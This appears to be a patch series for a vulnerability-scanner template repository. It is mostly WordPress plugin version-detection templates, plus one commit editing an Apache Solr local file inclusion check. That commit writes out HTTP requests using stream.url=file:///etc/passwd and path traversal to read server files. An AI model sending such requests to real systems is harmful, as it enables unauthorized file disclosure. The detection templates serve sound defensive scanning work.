path: + - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-google-maps.yaml b/technologies/wordpress/wordpress-wp-google-maps.yaml new file mode 100644 index 0000000000..0da079cc4d --- /dev/null +++ b/technologies/wordpress/wordpress-wp-google-maps.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-google-maps + +info: + name: WP Go Maps (formerly WP Google Maps) Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-google-maps/ + metadata: + plugin_namespace: wp-google-maps + wpscan: https://wpscan.com/plugin/wp-google-maps + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-mail-smtp.yaml b/technologies/wordpress/wordpress-wp-mail-smtp.yaml new file mode 100644 index 0000000000..3309e8735c --- /dev/null +++ b/technologies/wordpress/wordpress-wp-mail-smtp.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-mail-smtp + +info: + name: WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-mail-smtp/ + metadata: + plugin_namespace: wp-mail-smtp + wpscan: https://wpscan.com/plugin/wp-mail-smtp + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-maintenance-mode.yaml b/technologies/wordpress/wordpress-wp-maintenance-mode.yaml new file mode 100644 index 0000000000..aa48586418 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-maintenance-mode.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-maintenance-mode + +info: + name: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-maintenance-mode/ + metadata: + plugin_namespace: wp-maintenance-mode + wpscan: https://wpscan.com/plugin/wp-maintenance-mode + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-migrate-db.yaml b/technologies/wordpress/wordpress-wp-migrate-db.yaml new file mode 100644 index 0000000000..af8a032196 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-migrate-db.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-migrate-db + +info: + name: WP Migrate Lite – WordPress Migration Made Easy Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-migrate-db/ + metadata: + plugin_namespace: wp-migrate-db + wpscan: https://wpscan.com/plugin/wp-migrate-db + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-multibyte-patch.yaml b/technologies/wordpress/wordpress-wp-multibyte-patch.yaml new file mode 100644 index 0000000000..d6a5318eec --- /dev/null +++ b/technologies/wordpress/wordpress-wp-multibyte-patch.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-multibyte-patch + +info: + name: WP Multibyte Patch Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-multibyte-patch/ + metadata: + plugin_namespace: wp-multibyte-patch + wpscan: https://wpscan.com/plugin/wp-multibyte-patch + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-optimize.yaml b/technologies/wordpress/wordpress-wp-optimize.yaml new file mode 100644 index 0000000000..2a1bceaf77 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-optimize.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-optimize + +info: + name: WP-Optimize – Cache, Clean, Compress. Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-optimize/ + metadata: + plugin_namespace: wp-optimize + wpscan: https://wpscan.com/plugin/wp-optimize + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-pagenavi.yaml b/technologies/wordpress/wordpress-wp-pagenavi.yaml new file mode 100644 index 0000000000..c32ee6bc4e --- /dev/null +++ b/technologies/wordpress/wordpress-wp-pagenavi.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-pagenavi + +info: + name: WP-PageNavi Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-pagenavi/ + metadata: + plugin_namespace: wp-pagenavi + wpscan: https://wpscan.com/plugin/wp-pagenavi + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-reset.yaml b/technologies/wordpress/wordpress-wp-reset.yaml new file mode 100644 index 0000000000..e82f4ecd2d --- /dev/null +++ b/technologies/wordpress/wordpress-wp-reset.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-reset + +info: + name: WP Reset – Most Advanced WordPress Reset Tool Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-reset/ + metadata: + plugin_namespace: wp-reset + wpscan: https://wpscan.com/plugin/wp-reset + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-sitemap-page.yaml b/technologies/wordpress/wordpress-wp-sitemap-page.yaml new file mode 100644 index 0000000000..f0b55eb8a2 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-sitemap-page.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-sitemap-page + +info: + name: WP Sitemap Page Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-sitemap-page/ + metadata: + plugin_namespace: wp-sitemap-page + wpscan: https://wpscan.com/plugin/wp-sitemap-page + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-smushit.yaml b/technologies/wordpress/wordpress-wp-smushit.yaml new file mode 100644 index 0000000000..31739b7ab2 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-smushit.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-smushit + +info: + name: Smush – Lazy Load Images, Optimize & Compress Images Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-smushit/ + metadata: + plugin_namespace: wp-smushit + wpscan: https://wpscan.com/plugin/wp-smushit + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-statistics.yaml b/technologies/wordpress/wordpress-wp-statistics.yaml new file mode 100644 index 0000000000..a936c13bc5 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-statistics.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-statistics + +info: + name: WP Statistics Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-statistics/ + metadata: + plugin_namespace: wp-statistics + wpscan: https://wpscan.com/plugin/wp-statistics + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-super-cache.yaml b/technologies/wordpress/wordpress-wp-super-cache.yaml new file mode 100644 index 0000000000..f1eb6675d6 --- /dev/null +++ b/technologies/wordpress/wordpress-wp-super-cache.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-super-cache + +info: + name: WP Super Cache Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-super-cache/ + metadata: + plugin_namespace: wp-super-cache + wpscan: https://wpscan.com/plugin/wp-super-cache + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wp-user-avatar.yaml b/technologies/wordpress/wordpress-wp-user-avatar.yaml new file mode 100644 index 0000000000..cba8bca38a --- /dev/null +++ b/technologies/wordpress/wordpress-wp-user-avatar.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wp-user-avatar + +info: + name: Paid Membership, Ecommerce, User Registration, Login, User Profile & Restrict Content Plugin – ProfilePress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-user-avatar/ + metadata: + plugin_namespace: wp-user-avatar + wpscan: https://wpscan.com/plugin/wp-user-avatar + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml b/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml new file mode 100644 index 0000000000..e2cdfb47ad --- /dev/null +++ b/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wpcf7-recaptcha + +info: + name: ReCaptcha v2 for Contact Form 7 Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wpcf7-recaptcha/ + metadata: + plugin_namespace: wpcf7-recaptcha + wpscan: https://wpscan.com/plugin/wpcf7-recaptcha + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wpcf7-redirect.yaml b/technologies/wordpress/wordpress-wpcf7-redirect.yaml new file mode 100644 index 0000000000..da6c9aa1d8 --- /dev/null +++ b/technologies/wordpress/wordpress-wpcf7-redirect.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wpcf7-redirect + +info: + name: Redirection for Contact Form 7 Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wpcf7-redirect/ + metadata: + plugin_namespace: wpcf7-redirect + wpscan: https://wpscan.com/plugin/wpcf7-redirect + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wpforms-lite.yaml b/technologies/wordpress/wordpress-wpforms-lite.yaml new file mode 100644 index 0000000000..83af57d9da --- /dev/null +++ b/technologies/wordpress/wordpress-wpforms-lite.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wpforms-lite + +info: + name: Contact Form by WPForms – Drag & Drop Form Builder for WordPress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wpforms-lite/ + metadata: + plugin_namespace: wpforms-lite + wpscan: https://wpscan.com/plugin/wpforms-lite + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wps-hide-login.yaml b/technologies/wordpress/wordpress-wps-hide-login.yaml new file mode 100644 index 0000000000..57d553c989 --- /dev/null +++ b/technologies/wordpress/wordpress-wps-hide-login.yaml @@ -0,0 +1,35 @@ + +id: wordpress-wps-hide-login + +info: + name: WPS Hide Login Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wps-hide-login/ + metadata: + plugin_namespace: wps-hide-login + wpscan: https://wpscan.com/plugin/wps-hide-login + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml b/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml new file mode 100644 index 0000000000..52c0cef0c0 --- /dev/null +++ b/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml @@ -0,0 +1,35 @@ + +id: wordpress-yith-woocommerce-compare + +info: + name: YITH WooCommerce Compare Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/yith-woocommerce-compare/ + metadata: + plugin_namespace: yith-woocommerce-compare + wpscan: https://wpscan.com/plugin/yith-woocommerce-compare + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-compare/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml new file mode 100644 index 0000000000..ccf4d7d013 --- /dev/null +++ b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml @@ -0,0 +1,35 @@ + +id: wordpress-yith-woocommerce-wishlist + +info: + name: YITH WooCommerce Wishlist Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/yith-woocommerce-wishlist/ + metadata: + plugin_namespace: yith-woocommerce-wishlist + wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' From 843264155b58ddf47485d8d5f7fb8d9ba5e5cd3b Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Thu, 1 Dec 2022 18:51:21 -0500 Subject: [PATCH 0043/1133] Update apache-solr-file-read.yaml 1. The added GET request triggers a file local read on Windows OS. 2. Matcher added to the Response trigger by 1. 3. Matcher for other cases (Errors, ie. not found path) --- .../apache/apache-solr-file-read.yaml | 27 ++++++++++++++----- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index ccb3629709..6ccddb4c27 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -2,7 +2,7 @@ id: apache-solr-file-read info: name: Apache Solr <= 8.8.1 - Local File Inclusion - author: DhiyaneshDk + author: DhiyaneshDk, philippedelteil severity: high description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion. reference: @@ -22,6 +22,12 @@ requests: Host: {{Hostname}} Accept-Language: en Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close - | GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 @@ -37,14 +43,21 @@ requests: regex: - '"name"\:"(.*?)"' - matchers-condition: and matchers: - - type: status - status: - - 200 - + - type: word + name: "Windows" + words: + - "Windows" + - "Users" + - "org.apache.solr.handler.DumpRequestHandler" + condition: and - type: regex + name: "Linux" regex: - "root:.*:0:0:" - + - type: word + name: "Other" + words: + - "java.io.FileNotFoundException" + # Enhanced by mp on 2022/07/22 From 7aebf003e940c004197d6c6fe4af38814542e4b3 Mon Sep 17 00:00:00 2001 From: Ricardo Maia <rsmaia@gmail.com> Date: Thu, 1 Dec 2022 21:47:18 -0300 Subject: [PATCH 0044/1133] Removing blank lines --- technologies/wordpress/wordpress-ad-inserter.yaml | 7 +++---- technologies/wordpress/wordpress-add-to-any.yaml | 7 +++---- technologies/wordpress/wordpress-admin-menu-editor.yaml | 7 +++---- technologies/wordpress/wordpress-adminimize.yaml | 7 +++---- .../wordpress/wordpress-advanced-custom-fields.yaml | 7 +++---- technologies/wordpress/wordpress-akismet.yaml | 7 +++---- .../wordpress/wordpress-all-404-redirect-to-homepage.yaml | 7 +++---- technologies/wordpress/wordpress-all-in-one-seo-pack.yaml | 7 +++---- .../wordpress/wordpress-all-in-one-wp-migration.yaml | 7 +++---- .../wordpress-all-in-one-wp-security-and-firewall.yaml | 7 +++---- technologies/wordpress/wordpress-amp.yaml | 7 +++---- technologies/wordpress/wordpress-antispam-bee.yaml | 7 +++---- technologies/wordpress/wordpress-astra-sites.yaml | 7 +++---- technologies/wordpress/wordpress-astra-widgets.yaml | 7 +++---- technologies/wordpress/wordpress-autoptimize.yaml | 7 +++---- technologies/wordpress/wordpress-backwpup.yaml | 7 +++---- .../wordpress/wordpress-better-search-replace.yaml | 7 +++---- technologies/wordpress/wordpress-better-wp-security.yaml | 7 +++---- .../wordpress/wordpress-black-studio-tinymce-widget.yaml | 7 +++---- technologies/wordpress/wordpress-breadcrumb-navxt.yaml | 7 +++---- technologies/wordpress/wordpress-broken-link-checker.yaml | 7 +++---- .../wordpress/wordpress-child-theme-configurator.yaml | 7 +++---- technologies/wordpress/wordpress-classic-editor.yaml | 7 +++---- technologies/wordpress/wordpress-classic-widgets.yaml | 7 +++---- .../wordpress/wordpress-click-to-chat-for-whatsapp.yaml | 7 +++---- technologies/wordpress/wordpress-cloudflare.yaml | 7 +++---- technologies/wordpress/wordpress-cmb2.yaml | 7 +++---- technologies/wordpress/wordpress-coblocks.yaml | 7 +++---- technologies/wordpress/wordpress-code-snippets.yaml | 7 +++---- technologies/wordpress/wordpress-coming-soon.yaml | 7 +++---- technologies/wordpress/wordpress-complianz-gdpr.yaml | 7 +++---- .../wordpress/wordpress-contact-form-7-honeypot.yaml | 7 +++---- technologies/wordpress/wordpress-contact-form-7.yaml | 7 +++---- technologies/wordpress/wordpress-contact-form-cfdb7.yaml | 7 +++---- technologies/wordpress/wordpress-cookie-law-info.yaml | 7 +++---- technologies/wordpress/wordpress-cookie-notice.yaml | 7 +++---- technologies/wordpress/wordpress-creame-whatsapp-me.yaml | 7 +++---- .../wordpress-creative-mail-by-constant-contact.yaml | 7 +++---- technologies/wordpress/wordpress-custom-css-js.yaml | 7 +++---- technologies/wordpress/wordpress-custom-fonts.yaml | 7 +++---- technologies/wordpress/wordpress-custom-post-type-ui.yaml | 7 +++---- technologies/wordpress/wordpress-disable-comments.yaml | 7 +++---- technologies/wordpress/wordpress-disable-gutenberg.yaml | 7 +++---- technologies/wordpress/wordpress-duplicate-page.yaml | 7 +++---- technologies/wordpress/wordpress-duplicate-post.yaml | 7 +++---- technologies/wordpress/wordpress-duplicator.yaml | 7 +++---- .../wordpress-duracelltomi-google-tag-manager.yaml | 7 +++---- technologies/wordpress/wordpress-easy-fancybox.yaml | 7 +++---- technologies/wordpress/wordpress-easy-google-fonts.yaml | 7 +++---- .../wordpress/wordpress-easy-table-of-contents.yaml | 7 +++---- technologies/wordpress/wordpress-easy-wp-smtp.yaml | 7 +++---- technologies/wordpress/wordpress-elementor.yaml | 7 +++---- technologies/wordpress/wordpress-elementskit-lite.yaml | 7 +++---- technologies/wordpress/wordpress-enable-media-replace.yaml | 7 +++---- technologies/wordpress/wordpress-envato-elements.yaml | 7 +++---- .../wordpress-essential-addons-for-elementor-lite.yaml | 7 +++---- technologies/wordpress/wordpress-ewww-image-optimizer.yaml | 7 +++---- .../wordpress/wordpress-facebook-for-woocommerce.yaml | 7 +++---- .../wordpress-favicon-by-realfavicongenerator.yaml | 7 +++---- technologies/wordpress/wordpress-flamingo.yaml | 7 +++---- technologies/wordpress/wordpress-fluentform.yaml | 7 +++---- technologies/wordpress/wordpress-font-awesome.yaml | 7 +++---- .../wordpress/wordpress-force-regenerate-thumbnails.yaml | 7 +++---- technologies/wordpress/wordpress-formidable.yaml | 7 +++---- technologies/wordpress/wordpress-forminator.yaml | 7 +++---- technologies/wordpress/wordpress-ga-google-analytics.yaml | 7 +++---- .../wordpress-google-analytics-dashboard-for-wp.yaml | 7 +++---- .../wordpress-google-analytics-for-wordpress.yaml | 7 +++---- .../wordpress/wordpress-google-listings-and-ads.yaml | 7 +++---- technologies/wordpress/wordpress-google-site-kit.yaml | 7 +++---- .../wordpress/wordpress-google-sitemap-generator.yaml | 7 +++---- technologies/wordpress/wordpress-gtranslate.yaml | 7 +++---- technologies/wordpress/wordpress-gutenberg.yaml | 7 +++---- .../wordpress/wordpress-happy-elementor-addons.yaml | 7 +++---- .../wordpress/wordpress-header-and-footer-scripts.yaml | 7 +++---- .../wordpress/wordpress-header-footer-code-manager.yaml | 7 +++---- .../wordpress/wordpress-header-footer-elementor.yaml | 7 +++---- technologies/wordpress/wordpress-header-footer.yaml | 7 +++---- technologies/wordpress/wordpress-health-check.yaml | 7 +++---- technologies/wordpress/wordpress-hello-dolly.yaml | 7 +++---- technologies/wordpress/wordpress-imagify.yaml | 7 +++---- technologies/wordpress/wordpress-imsanity.yaml | 7 +++---- .../wordpress/wordpress-insert-headers-and-footers.yaml | 7 +++---- technologies/wordpress/wordpress-instagram-feed.yaml | 7 +++---- .../wordpress/wordpress-intuitive-custom-post-order.yaml | 7 +++---- technologies/wordpress/wordpress-iwp-client.yaml | 7 +++---- technologies/wordpress/wordpress-jetpack.yaml | 7 +++---- technologies/wordpress/wordpress-kadence-blocks.yaml | 7 +++---- technologies/wordpress/wordpress-kirki.yaml | 7 +++---- technologies/wordpress/wordpress-leadin.yaml | 7 +++---- .../wordpress/wordpress-limit-login-attempts-reloaded.yaml | 7 +++---- technologies/wordpress/wordpress-limit-login-attempts.yaml | 7 +++---- technologies/wordpress/wordpress-litespeed-cache.yaml | 7 +++---- technologies/wordpress/wordpress-loco-translate.yaml | 7 +++---- technologies/wordpress/wordpress-loginizer.yaml | 7 +++---- technologies/wordpress/wordpress-loginpress.yaml | 7 +++---- .../wordpress/wordpress-mailchimp-for-woocommerce.yaml | 7 +++---- technologies/wordpress/wordpress-mailpoet.yaml | 7 +++---- technologies/wordpress/wordpress-maintenance.yaml | 7 +++---- technologies/wordpress/wordpress-mainwp-child.yaml | 7 +++---- technologies/wordpress/wordpress-malcare-security.yaml | 7 +++---- technologies/wordpress/wordpress-megamenu.yaml | 7 +++---- technologies/wordpress/wordpress-members.yaml | 7 +++---- technologies/wordpress/wordpress-meta-box.yaml | 7 +++---- technologies/wordpress/wordpress-ml-slider.yaml | 7 +++---- technologies/wordpress/wordpress-newsletter.yaml | 7 +++---- .../wordpress/wordpress-nextend-facebook-connect.yaml | 7 +++---- technologies/wordpress/wordpress-nextgen-gallery.yaml | 7 +++---- technologies/wordpress/wordpress-ninja-forms.yaml | 7 +++---- technologies/wordpress/wordpress-ocean-extra.yaml | 7 +++---- .../wordpress/wordpress-official-facebook-pixel.yaml | 7 +++---- .../wordpress/wordpress-one-click-demo-import.yaml | 7 +++---- technologies/wordpress/wordpress-optinmonster.yaml | 7 +++---- technologies/wordpress/wordpress-password-protected.yaml | 7 +++---- technologies/wordpress/wordpress-pdf-embedder.yaml | 7 +++---- technologies/wordpress/wordpress-photo-gallery.yaml | 7 +++---- .../wordpress/wordpress-php-compatibility-checker.yaml | 7 +++---- technologies/wordpress/wordpress-pixelyoursite.yaml | 7 +++---- technologies/wordpress/wordpress-polylang.yaml | 7 +++---- technologies/wordpress/wordpress-popup-builder.yaml | 7 +++---- technologies/wordpress/wordpress-popup-maker.yaml | 7 +++---- technologies/wordpress/wordpress-post-duplicator.yaml | 7 +++---- technologies/wordpress/wordpress-post-smtp.yaml | 7 +++---- technologies/wordpress/wordpress-post-types-order.yaml | 7 +++---- .../wordpress/wordpress-premium-addons-for-elementor.yaml | 7 +++---- technologies/wordpress/wordpress-pretty-link.yaml | 7 +++---- .../wordpress/wordpress-really-simple-captcha.yaml | 7 +++---- technologies/wordpress/wordpress-really-simple-ssl.yaml | 7 +++---- technologies/wordpress/wordpress-redirection.yaml | 7 +++---- technologies/wordpress/wordpress-redux-framework.yaml | 7 +++---- .../wordpress/wordpress-regenerate-thumbnails.yaml | 7 +++---- technologies/wordpress/wordpress-safe-svg.yaml | 7 +++---- technologies/wordpress/wordpress-seo-by-rank-math.yaml | 7 +++---- technologies/wordpress/wordpress-sg-cachepress.yaml | 7 +++---- technologies/wordpress/wordpress-sg-security.yaml | 7 +++---- technologies/wordpress/wordpress-shortcodes-ultimate.yaml | 7 +++---- .../wordpress/wordpress-shortpixel-image-optimiser.yaml | 7 +++---- .../wordpress/wordpress-simple-custom-post-order.yaml | 7 +++---- technologies/wordpress/wordpress-simple-page-ordering.yaml | 7 +++---- technologies/wordpress/wordpress-siteguard.yaml | 7 +++---- technologies/wordpress/wordpress-siteorigin-panels.yaml | 7 +++---- technologies/wordpress/wordpress-smart-slider-3.yaml | 7 +++---- technologies/wordpress/wordpress-so-widgets-bundle.yaml | 7 +++---- .../wordpress/wordpress-ssl-insecure-content-fixer.yaml | 7 +++---- .../wordpress-stops-core-theme-and-plugin-updates.yaml | 7 +++---- technologies/wordpress/wordpress-sucuri-scanner.yaml | 7 +++---- technologies/wordpress/wordpress-svg-support.yaml | 7 +++---- .../wordpress/wordpress-table-of-contents-plus.yaml | 7 +++---- technologies/wordpress/wordpress-tablepress.yaml | 7 +++---- technologies/wordpress/wordpress-taxonomy-terms-order.yaml | 7 +++---- technologies/wordpress/wordpress-the-events-calendar.yaml | 7 +++---- technologies/wordpress/wordpress-themeisle-companion.yaml | 7 +++---- 